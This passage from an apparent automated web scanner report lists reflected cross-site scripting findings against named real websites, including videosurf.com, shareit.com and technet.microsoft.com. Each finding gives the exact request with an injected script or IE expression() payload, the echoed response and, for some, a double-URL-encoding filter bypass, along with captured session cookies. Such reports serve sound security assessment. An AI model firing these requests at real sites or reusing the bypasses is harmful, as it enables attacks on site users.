Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfb27bc26; expires=Sun, 11-Dec-2011 18:15:14 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:13 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videosf52e6"><script>alert(1)</script>b84ec9d5f23/'"/>
...[SNIP]...

2.147. http://myspace.videosurf.com/videos/' [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6b"><script>alert(1)</script>318850b51ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/'68f6b"><script>alert(1)</script>318850b51ea HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:15:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=9gl362l43dogk2oljib78052c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=13; expires=Sun, 11-Dec-2011 18:15:16 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfb4832cf; expires=Sun, 11-Dec-2011 18:15:16 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:15 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videos/'68f6b"><script>alert(1)</script>318850b51ea"/>
...[SNIP]...

2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f540"><script>alert(1)</script>1833c6fd0c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=itp0ancg0e8qugkdhhatbfiue7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=69; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfaf56f5b; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=096de3142e7b1ebcfea7f470df6d7651; expires=Sat, 11-Dec-2010 21:15:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/videos/'?2f540"><script>alert(1)</script>1833c6fd0c5=1"/>
...[SNIP]...

2.149. http://network.videosurf.com/beacon/people_search/myspace [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.videosurf.com
Path:   /beacon/people_search/myspace

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a42"><script>alert(1)</script>e44f5d0946f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace HTTP/1.1
Host: network.videosurf.com
Proxy-Connection: keep-alive
Referer: http://www.myspace.com/search/people?q='&ac=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 17:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=p7nd8357tp5poomlin8hoftkh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=70; expires=Sun, 11-Dec-2011 17:21:33 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03b31d48eee; expires=Sun, 11-Dec-2011 17:21:33 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 17:21:32 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://network.videosurf.com/beacon91a42"><script>alert(1)</script>e44f5d0946f/people_search/myspace"/>
...[SNIP]...

2.150. http://programs.lucidimagination.com/AW-WP-LS4ES.html [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://programs.lucidimagination.com
Path:   /AW-WP-LS4ES.html

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72933"><script>alert(1)</script>da10c2a3e86 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AW-WP-LS4ES.html?sc=WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86&_kk=intranet%20search&_kt=ed18f41f-c691-4861-bd74-c8fab6a6d457/x22 HTTP/1.1
Host: programs.lucidimagination.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: ARPT=LWYXXLSGw2CYLQ; path=/
Date: Sat, 11 Dec 2010 18:15:35 GMT
Server: Apache
Content-Length: 27011
Vary: *,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-LS4ES-GS1U72933"><script>alert(1)</script>da10c2a3e86" />
...[SNIP]...

2.151. http://programs.lucidimagination.com/AW-WP-Starting.html [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://programs.lucidimagination.com
Path:   /AW-WP-Starting.html

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f77b"><script>alert(1)</script>dd903c9789a was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AW-WP-Starting.html?sc=WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a&_kk=intranet%20search%20engine&_kt=21825d11-df4f-47a4-b659-cc8be4a11a7b/x22 HTTP/1.1
Host: programs.lucidimagination.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: ARPT=LWYXXLSGw1CYLO; path=/
Date: Sat, 11 Dec 2010 18:15:35 GMT
Server: Apache
Content-Length: 27222
Vary: *,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<input class='mktFormHidden' name="Web_Source_Type__c" id="Web_Source_Type__c" type='hidden' value="WP-START-GS1U7f77b"><script>alert(1)</script>dd903c9789a" />
...[SNIP]...

2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/cart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5729f"style="x:expression(alert(1))"ed5840556f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shareit/cart.html?productid=300057806&currencies=USD&js=0&5729f"style%3d"x%3aexpression(alert(1))"ed5840556f1=1 HTTP/1.1
Host: secure.shareit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:17:24 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>share*it! - A service of Digital River (DEF03)</title>
<style type="
...[SNIP]...
<form action="/shareit/cart.html?currencies=USD&js=0&5729f"style="x:expression(alert(1))"ed5840556f1=1&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120&sessionid=1800044594&random=73ee187dc9960f099e807ed1d9f39120" method="post">
...[SNIP]...

2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d392f"style="x:expression(alert(1))"3005d8d59cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shareit/product.html?sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&productid=300057806&d392f"style%3d"x%3aexpression(alert(1))"3005d8d59cb=1 HTTP/1.1
Host: secure.shareit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000;

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:17:12 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>share*it! - A service of Digital River (DEF03) - Bean Software Searc
...[SNIP]...
<form action="/shareit/product.html?productid=300057806&d392f"style="x:expression(alert(1))"3005d8d59cb=1&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662&sessionid=1800022192&random=653532a7deb50ad19c4cc7e5d4305662" method="post">
...[SNIP]...

2.154. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75281%2522%253e%253ca%253ebc4fa03f4e7 was submitted in the REST URL parameter 1. This input was echoed as 75281"><a>bc4fa03f4e7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us75281%2522%253e%253ca%253ebc4fa03f4e7/library/aa991542.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us75281"><a>bc4fa03f4e7/library/aa991542" />
...[SNIP]...

2.155. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf0f%2522%253e%253ca%253e84fddc32f18 was submitted in the REST URL parameter 2. This input was echoed as 9bf0f"><a>84fddc32f18 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9bf0f%2522%253e%253ca%253e84fddc32f18/aa991542.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9bf0f"><a>84fddc32f18/aa991542" />
...[SNIP]...

2.156. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/aa991542.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6463%2522%253e%253ca%253efc79662f9f2 was submitted in the REST URL parameter 3. This input was echoed as e6463"><a>fc79662f9f2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/aa991542.aspxe6463%2522%253e%253ca%253efc79662f9f2 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/aa991542.aspxe6463"><a>fc79662f9f2" />
...[SNIP]...

2.157. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb625087.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46021%2522%253e%253ca%253eead3e3d9a48 was submitted in the REST URL parameter 1. This input was echoed as 46021"><a>ead3e3d9a48 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

